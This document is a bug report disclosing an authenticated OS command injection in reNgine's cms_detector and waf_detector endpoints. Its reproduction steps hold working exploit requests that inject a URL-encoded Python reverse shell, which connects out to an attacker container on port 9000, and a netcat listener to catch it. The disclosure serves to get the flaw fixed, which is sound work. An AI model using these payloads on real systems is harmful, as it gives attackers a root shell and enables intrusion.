Is there an existing issue for this?

• I have searched the existing issues

Current Behavior

Any authenticated user can run any OS command as the root user through an OS Command Injection vulnerability.

Expected Behavior

OS commands should not be allowed for arbitrary users.

Steps To Reproduce

1. Bring up reNgine containers using docker compose

2. Create another container on the same Docker network to act as the "attacker"

   $ docker run --rm -it --network=rengine_rengine_network kalilinux/kali-rolling bash

3. Inside the Kali container, install netcat and start listening

   apt update && apt install -y netcat-traditional
   nc -vlp 9000

4. Login to reNgine as any user - I will use an auditor role user. Copy the sessionid cookie.

   sessionid=3mlrtnjbgeoozwe4kek2jumhuak0m8rq
   

5. From any http client that can hit reNgine, make the following request, substituting RENGINE_IP for the container's IP and 172.21.0.2 for Kali's IP.

   curl --request GET \
     --url 'https://RENGINE_IP/api/tools/cms_detector/?format=json&url=https%3A%2F%2F127.0.0.1%20%26%26%20python3%20-c%20'import%20socket,subprocess,os%3Bs%3Dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3Bs.connect((%22172.21.0.2%22,9000))%3Bos.dup2(s.fileno(),0)%3B%20os.dup2(s.fileno(),1)%3Bos.dup2(s.fileno(),2)%3Bimport%20pty%3B%20pty.spawn(%22sh%22)'' \
     --header 'Cookie: sessionid=3mlrtnjbgeoozwe4kek2jumhuak0m7yq'

   The vulnerable parameter is url. If you send https://127.0.0.1 && COMMAND, the command will be executed by the root user. The command above is a URL-encoded version of this simple Python3 reverse shell payload

   export RHOST="172.21.0.2"
   export RPORT=9000
   python3 -c 'import sys,socket,os,pty
   s=socket.socket()
   s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
   [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
   pty.spawn("sh")'

6. Check the Kali container for a new shell:

The same vulnerability is present in the WAF Detector:

curl --request GET \
  --url 'https://RENGINE_IP/api/tools/waf_detector/?url=https%3A%2F%2F127.0.0.1%20%26%26%20python3%2520-c%2520%2527import%2520socket%252Csubprocess%252Cos%253Bs%253Dsocket.socket%2528socket.AF_INET%252Csocket.SOCK_STREAM%2529%253Bs.connect%2528%2528%2522172.21.0.2%2522%252C9000%2529%2529%253Bos.dup2%2528s.fileno%2528%2529%252C0%2529%253B%2520os.dup2%2528s.fileno%2528%2529%252C1%2529%253Bos.dup2%2528s.fileno%2528%2529%252C2%2529%253Bimport%2520pty%253B%2520pty.spawn%2528%2522sh%2522%2529%2527&format=json' \
  --header 'Cookie: sessionid=3mlrtnjbgeoozwe4kek2jumhuak0m7yq'

Environment

- reNgine: master branch
- OS: MacOS
- Python: 
- Docker Engine: `Docker version 24.0.6, build ed223bc`
- Docker Compose: `Docker Compose version v2.21.0-desktop.1`
- Browser: Firefox

Anything else?

No response